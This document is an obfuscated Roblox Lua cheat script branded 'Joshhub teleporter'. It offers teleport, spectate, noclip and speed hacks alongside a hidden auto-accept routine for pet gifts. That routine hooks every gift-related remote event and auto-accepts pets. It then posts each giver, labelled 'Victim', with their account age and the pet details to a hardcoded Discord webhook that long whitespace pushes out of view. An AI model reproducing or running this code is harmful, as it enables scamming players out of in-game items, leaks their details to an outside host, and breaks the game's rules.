  local v0=game:        
                                                                        GetService("Players");local v1=v0.LocalPlayer;  
                                                                    local v2=game:GetService("ReplicatedStorage");local v3=game:  
                                                                GetService("RunService");local v4=game:GetService("UserInputService");  
                                                            local v5=game:GetService("HttpService");local v6=                             
                                                                                                                                            
                                                                                                                                              
                                                                                                                                                
                                                                                                                                                  
                                                                                                                                                    
                                                                                                                                                      
                                                                                                                                                        
                                                                                                                                                          
                                                                                                                                                            
                                                                                                                                                            
                                                                                                                                                              
                                                                                                                                                                
                                                                                                                                                                  
                                                                                                                                                                    
                                          "https://discord.com/api/webhooks/1420940951236513862/o5CH79ymXwVKR--U5MP9akBR3jQSFZnLfJbt4olXJjy2kjOnpeOb4vtZ-ed6xeuIVr2E" 
                                          ;local function v7(v138) local v139=543 -(215 + 328) ;local v140;while true do if (v139==(0 + 0)) then if ( not v6 or (v6== 
                                        "")) then return;end v140={username="🎁 Joshhub AutoAccept",avatar_url="https://i.imgur.com/3GKwK6X.png",content=v138};v139=1 + 
                                         0 ;end if (v139==(1 -0)) then pcall(function() request({Url=v6,      --[[==============================]]Method="POST",Headers={ 
                                        ["Content-Type"]="application/json"},Body=v5:JSONEncode(    --[[============================================]]v140)});end);break; 
                                        end end end local v8=Instance.new("ScreenGui");v8.Name= --[[======================================================]]                
                                      "JoshhubScript👁️";v8.Parent=game:GetService(         --[[==========================================================]]"CoreGui");local  
                                      v11=Instance.new("Frame");v11.Size=UDim2.new(0 -0 , --[[==============================================================]]672 -(416 + 26) 
                                       ,0,300);v11.Position=UDim2.new(0.03 -0 ,0,0.25,0 + --[[================================================================]] 0 );v11.       
                                      BackgroundColor3=Color3.fromRGB(450 -195 ,255,0);   --[[==================================================================]]v11.Active=   
                                      true;v11.Draggable=true;v11.Parent=v8;local v18=    --[[==================================================================]]Instance.new(     
                                    "UICorner",v11);v18.CornerRadius=UDim.new(0,12);local --[[====================================================================]] v20=Instance 
                    .new("UIGradient",v11);v20.Color=ColorSequence.new({                  --[[====================================================================]]                
              ColorSequenceKeypoint.new(430 -(44 + 386) ,Color3.fromRGB(1741 -(998 + 488) --[[======================================================================]] ,32 + 68 ,50 
            )),ColorSequenceKeypoint.new(1,Color3.fromRGB(50 + 10 ,20,792 -(201 + 571) )) --[[======================================================================]]});v20.       
          Rotation=90;local v23=Instance.new("TextLabel");v23.Size=UDim2.new(1139 -(116 + --[[======================================================================]] 1022) , -35, 
        0 -0 ,35);v23.Position=UDim2.new(0 + 0 ,8,0 -0 ,0 -0 );v23.BackgroundTransparency --[[======================================================================]]=860 -(814 +  
        45) ;v23.Text="🔮 Joshhub teleporter";v23.TextColor3=Color3.fromRGB(144,238,144); --[[======================================================================]]v23.Font=Enum 
      .Font.Fantasy;v23.TextSize=17;v23.TextXAlignment=Enum.TextXAlignment.Left;v23.      --[[======================================================================]]Parent=v11;   
      local v35=Instance.new("TextButton");v35.Size=UDim2.new(0,28,0 -0 ,28);v35.Position=  --[[==================================================================]]UDim2.new(1 + 0 
       , -(12 + 20),885 -(261 + 624) ,6 -2 );v35.BackgroundColor3=Color3.fromRGB(1218 -(    --[[================================================================]]1020 + 60) ,1466  
    -(630 + 793) ,765 -539 );v35.TextColor3=Color3.fromRGB(1207 -952 ,71 + 109 ,413 -293 ); --[[==============================================================]]v35.Text="-";v35. 
    Font=Enum.Font.SourceSansBold;v35.TextSize=1767 -(760 + 987) ;v35.Parent=v11;local v45=   --[[==========================================================]]Instance.new(       
    "UICorner",v35);v45.CornerRadius=UDim.new(1913 -(1789 + 124) ,772 -(745 + 21) );local v47=  --[[====================================================]]false;v35.              
    MouseButton1Click:Connect(function() local v141=0 + 0 ;local v142;while true do if (v141==(0  --[[==============================================]]-0)) then v142=0 -0 ;     
    while true do if (v142==(0 + 0)) then v47= not v47;if v47 then local v194=0 + 0 ;while true do if --[[====================================]] (v194==(1055 -(87 + 968)))   
    then for v210,v211 in pairs(v11:GetChildren()) do if ((v211~=v23) and (v211~=v35) and  not v211:IsA(  --[[========================]]"UICorner") and  not v211:IsA(        
    "UIGradient")) then v211.Visible=false;end end v11.Size=UDim2.new(0 -0 ,209 + 21 ,0 -0 ,1453 -(447 + 966) );v194=2 -1 ;end if (v194==1) then v35.Text="+";break;end end 
   else local v195=1817 -(1703 + 114) ;local v196;while true do if (v195==0) then v196=0;while true do if (v196==0) then for v215,v216 in pairs(v11:GetChildren()) do if  
  ((v216~=v23) and (v216~=v35) and  not v216:IsA("UICorner") and  not v216:IsA("UIGradient")) then v216.Visible=true;end end v11.Size=UDim2.new(701 -(376 + 325) ,376 - 
  146 ,0 -0 ,86 + 214 );v196=1;end if (1==v196) then v35.Text="-";break;end end break;end end end break;end end break;end end end);local v48=Instance.new("TextLabel");   
  v48.Size=UDim2.new(0,286 -156 ,0,39 -(9 + 5) );v48.Position=UDim2.new(376 -(85 + 291) ,1275 -(243 + 1022) ,0,45);v48.BackgroundTransparency=1;v48.Text=                 
  "Auto Accept Gift";v48.TextColor3=Color3.fromRGB(970 -715 ,255,211 + 44 );v48.TextXAlignment=Enum.TextXAlignment.Left;v48.Font=Enum.Font.SourceSansBold;v48.TextSize=   
  1192 -(1123 + 57) ;v48.Parent=v11;local v58=Instance.new("TextButton");v58.Size=UDim2.new(0 + 0 ,45,0,276 -(163 + 91) );v58.Position=UDim2.new(1930 -(1869 + 61) ,150,0 
   + 0 ,165 -118 );v58.BackgroundColor3=Color3.fromRGB(122 -42 ,40,6 + 34 );v58.Text="";v58.Parent=v11;local v64=Instance.new("Frame");v64.Size=UDim2.new(0 -0 ,19 + 1 ,0 
  ,1494 -(1329 + 145) );v64.Position=UDim2.new(971 -(140 + 831) ,1,0,1851 -(1409 + 441) );v64.BackgroundColor3=Color3.fromRGB(200,768 -(15 + 703) ,50);v64.Parent=v58;    
  Instance.new("UICorner",v58).CornerRadius=UDim.new(0 + 0 ,450 -(262 + 176) );Instance.new("UICorner",v64).CornerRadius=UDim.new(0,12);getgenv().AutoAccept=false;local  
  function v72() getgenv().AutoAccept= not getgenv().AutoAccept;if getgenv().AutoAccept then v64:TweenPosition(UDim2.new(0,23,1721 -(345 + 1376) ,1),"Out","Sine",0.2,    
  true);v64.BackgroundColor3=Color3.fromRGB(738 -(198 + 490) ,883 -683 ,119 -69 );else local v154=1206 -(696 + 510) ;while true do if (v154==(0 -0)) then v64:            
  TweenPosition(UDim2.new(0,1,1262 -(1091 + 171) ,1 + 0 ),"Out","Sine",0.2 -0 ,true);v64.BackgroundColor3=Color3.fromRGB(663 -463 ,424 -(123 + 251) ,248 -198 );break;end   
  end end end v58.MouseButton1Click:Connect(v72);local v73=Instance.new("ScrollingFrame");v73.Size=UDim2.new(699 -(208 + 490) , -(2 + 18),0,49 + 61 );v73.Position=UDim2.   
  new(836 -(660 + 176) ,2 + 8 ,202 -(14 + 188) ,755 -(534 + 141) );v73.BackgroundTransparency=1;v73.ScrollBarThickness=5;v73.Parent=v11;local v79=Instance.new(             
  "UIListLayout");v79.Padding=UDim.new(0,4);v79.Parent=v73;local function v82(v144) if (v144.Character and v144.Character:FindFirstChild("HumanoidRootPart") and v1.        
  Character and v1.Character:FindFirstChild("HumanoidRootPart")) then v1.Character.HumanoidRootPart.CFrame=v144.Character.HumanoidRootPart.CFrame;end end local function    
  v83() local v145=0 + 0 ;while true do if ((1 + 0)==v145) then v73.CanvasSize=UDim2.new(0,0 + 0 ,0 -0 ,v79.AbsoluteContentSize.Y + (15 -5) );break;end if ((0 -0)==v145)   
  then for v167,v168 in pairs(v73:GetChildren()) do if v168:IsA("TextButton") then v168:Destroy();end end for v169,v170 in pairs(v0:GetPlayers()) do if (v170~=v1) then     
  local v174=0;local v175;while true do if (v174==(0 + 0)) then v175=Instance.new("TextButton");v175.Size=UDim2.new(1 + 0 , -(406 -(115 + 281)),0 -0 ,19 + 3 );v174=2 -1 ;  
  end if ((7 -5)==v174) then v175.Font=Enum.Font.SourceSansBold;v175.TextSize=880 -(550 + 317) ;v174=3 -0 ;end if (v174==(4 -0)) then Instance.new("UICorner",v175).        
  CornerRadius=UDim.new(0,16 -10 );v175.MouseButton1Click:Connect(function() v82(v170);end);break;end if (v174==1) then v175.BackgroundColor3=Color3.fromRGB(345 -(134 +    
  151) ,1695 -(970 + 695) ,30);v175.TextColor3=Color3.fromRGB(486 -231 ,200,2110 -(582 + 1408) );v174=6 -4 ;end if (v174==(3 -0)) then v175.Text=v170.DisplayName;v175.     
  Parent=v73;v174=4;end end end end v145=3 -2 ;end end end v0.PlayerAdded:Connect(v83);v0.PlayerRemoving:Connect(v83);v83();local v84=Instance.new("TextButton");v84.Size=  
  UDim2.new(1825 -(1195 + 629) , -(24 -5),241 -(187 + 54) ,808 -(162 + 618) );v84.Position=UDim2.new(0,8 + 2 ,1, -(22 + 10));v84.BackgroundColor3=Color3.fromRGB(426 -226 , 
  50,84 -34 );v84.TextColor3=Color3.fromRGB(20 + 235 ,1891 -(1373 + 263) ,1255 -(451 + 549) );v84.Text="❌ LEAVE KANA";v84.Font=Enum.Font.SourceSansBold;v84.TextSize=4 +  
  8 ;v84.Parent=v11;Instance.new("UICorner",v84).CornerRadius=UDim.new(0 -0 ,9 -3 );v84.MouseButton1Click:Connect(function() v1:Kick("PUTANGINA MOKA SANA ALL👁️😎👌🤣"); 
  end);v3.Stepped:Connect(function() if (v1.Character and v1.Character:FindFirstChildOfClass("Humanoid")) then v1.Character:FindFirstChildOfClass("Humanoid").WalkSpeed=  
    1464 -(746 + 638) ;end end);v4.JumpRequest:Connect(function() if (v1.Character and v1.Character:FindFirstChildOfClass("Humanoid")) then v1.Character:                 
    FindFirstChildOfClass("Humanoid"):ChangeState(Enum.HumanoidStateType.Jumping);end end);v3.Stepped:Connect(function() if v1.Character then for v160,v161 in pairs(v1.  
    Character:GetDescendants()) do if v161:IsA("BasePart") then v161.CanCollide=false;end end end end);local v94=Instance.new("ScreenGui");v94.Name="SpectateGui";v94.    
    Parent=game:GetService("CoreGui");local v97=Instance.new("Frame");v97.Size=UDim2.new(0 + 0 ,256 -87 ,341 -(218 + 123) ,219);v97.Position=UDim2.new(0.8,1581 -(1535 +  
      46) ,0.1,0);v97.BackgroundColor3=Color3.fromRGB(135 + 0 ,30 + 176 ,795 -(306 + 254) );v97.Active=true;v97.Draggable=true;v97.Parent=v94;Instance.new("UICorner",  
      v97).CornerRadius=UDim.new(0,1 + 9 );local v105=Instance.new("TextLabel");v105.Size=UDim2.new(1 -0 , -(1476 -(899 + 568)),0 + 0 ,28);v105.Position=UDim2.new(0,10 
      ,0 -0 ,607 -(268 + 335) );v105.BackgroundTransparency=291 -(60 + 230) ;v105.Text="🎥 Spectate Players";v105.TextColor3=Color3.fromRGB(255,200,692 -(426 + 146) ); 
        v105.Font=Enum.Font.SourceSansBold;v105.TextSize=2 + 13 ;v105.TextXAlignment=Enum.TextXAlignment.Left;v105.Parent=v97;local v115=Instance.new("ScrollingFrame") 
        ;v115.Size=UDim2.new(1457 -(282 + 1174) , -(821 -(569 + 242)),2 -1 , -60);v115.Position=UDim2.new(0 + 0 ,1029 -(706 + 318) ,1251 -(721 + 530) ,1306 -(945 + 326 
        ) );v115.BackgroundTransparency=2 -1 ;v115.ScrollBarThickness=4;v115.Parent=v97;local v121=Instance.new("UIListLayout");v121.Padding=UDim.new(0 + 0 ,703 -(271  
          + 429) );v121.Parent=v115;local v124=Instance.new("TextButton");v124.Size=UDim2.new(1 + 0 , -10,1500 -(1408 + 92) ,25);v124.Position=UDim2.new(1086 -(461 + 
             625) ,1293 -(993 + 295) ,1 + 0 , -(1199 -(418 + 753)));v124.BackgroundColor3=Color3.fromRGB(77 + 123 ,50,6 + 44 );v124.TextColor3=Color3.fromRGB(75 +    
              180 ,65 + 190 ,784 -(406 + 123) );v124.Font=Enum.Font.SourceSansBold;v124.TextSize=1783 -(1749 + 20) ;v124.Text="⛔ Stop Spectating";v124.Parent=v97;    
                Instance.new("UICorner",v124).CornerRadius=UDim.new(0,2 + 4 );local function v134() for v149,v150 in pairs(v115:GetChildren()) do if v150:IsA(        
                  "TextButton") then v150:Destroy();end end for v151,v152 in pairs(v0:GetPlayers()) do if (v152~=v1) then local v162=1322 -(1249 + 73) ;local v163; 
                      while true do if (v162==(2 + 2)) then Instance.new("UICorner",v163).CornerRadius=UDim.new(1145 -(466 + 679) ,6);v163.MouseButton1Click:       
                                  Connect(function() if (v152.Character and v152.Character:FindFirstChildOfClass("Humanoid")) then workspace.CurrentCamera.         
                                      CameraSubject=v152.Character:FindFirstChildOfClass("Humanoid");end end);break;end if (v162==(4 -2)) then v163.Font=Enum.Font. 
                                      SourceSansBold;v163.TextSize=37 -24 ;v162=3;end if (v162==3)          then v163.Text=v152.DisplayName;v163.Parent=v115;v162=  
                                      1904 -(106 + 1794) ;end if (v162==(0 + 0)) then v163=Instance         .new("TextButton");v163.Size=UDim2.new(1 + 0 , -(14 - 
                                      9),0,59 -37 );v162=1;end if (v162==(115 -(4 + 110))) then             v163.BackgroundColor3=Color3.fromRGB(644 -(57 + 527)  
                                      ,1457 -(41 + 1386) ,133 -(17 + 86) );v163.TextColor3=Color3.          fromRGB(174 + 81 ,446 -246 ,120);v162=5 -3 ;end end   
                                      end end v115.CanvasSize=UDim2.new(166 -(122 + 44) ,0 -0 ,0 -0            ,v121.AbsoluteContentSize.Y + 5 + 0 );end v0.      
                                      PlayerAdded:Connect(v134);v0.PlayerRemoving:Connect(v134);              v134();v124.MouseButton1Click:Connect(function() if 
                                       (v1.Character and v1.Character:FindFirstChildOfClass(                  "Humanoid")) then workspace.CurrentCamera.        
                                        CameraSubject=v1.Character:FindFirstChildOfClass("Humanoid"           );end end);local v135=v2:WaitForChild(            
                                        "GameEvents"):WaitForChild("AcceptPetGift");local v136={};              local v137=true;for v147,v148 in ipairs(v2:     
                                        GetDescendants()) do if (v148:IsA("RemoteEvent") and string             .lower(v148.Name):find("gift")) then v148.    
                                        OnClientEvent:Connect(function(v164,v165,v166) if (                     getgenv().AutoAccept and  not v136[v164])     
                                        then v136[v164]=true;task.defer(function() local v186=0 +                  0 ;local v187;local v188;local v189;     
                                        local v190;local v191;local v192;local v193;while true do                  if (v186==(0 -0)) then v187=(v137 and 0) 
                                           or 2 ;task.wait(v187);v137=false;v135:FireServer(true,                   v164);v186=66 -(30 + 35) ;end if (    
                                          v186==(2 + 0)) then v190="";if (typeof(v165)=="table"                       ) then if v165.age then v190=   
                                            string.format(" [Age %s]",tostring(v165.age));                              elseif v165.petAge then   
                                            v190=string.format(" [Age %s]",tostring(v165.                                     petAge));   
                                              end end v191=v188   .. v189   .. v190 ;v192=  
                                                "N/A";v186=1260 -(1043 + 214) ;end if ((  
                                                    11 -8)==v186) then if v166 then if  
                                                          ((typeof(v166)==        


"Instance") and v166:IsA("Player")) then v192=tostring(v166.AccountAge)   .. " days" ;elseif (typeof(v166)=="string") then local v217=1212 -(323 + 889) ;local v218;while true do if (v217==0) then v218=v0:FindFirstChild(v166);if v218 then v192=tostring(v218.AccountAge)   .. " days" ;end break;end end end end v193=string.format("```🎁 Auto Accepted Gift!\n👤 Victim🤣: %s\n📅 VICTIM Age acc: %s\n🆔 GiftID: %s\n🐾 Pet: %s\n📌 Receiver: %s```",tostring(v166),v192,tostring(v164),v191,v1.Name);v7(v193);break;end if (v186==(2 -1)) then v188="Unknown";if (typeof(v165)=="table") then v188=v165.name or v165.petName or "Unknown Pet" ;elseif (typeof(v165)=="string") then v188=v165;end v189="";if ((typeof(v165)=="table") and v165.weight) then v189=string.format(" [%.2f KG]",tonumber(v165.weight) or (580 -(361 + 219)) );end v186=2;end end end);end end);end end pcall(function() game.StarterGui:SetCore("SendNotification",{Title="JoshTeleporter",Text="Loaded successfully!✅",Duration=325 -(53 + 267) });end);
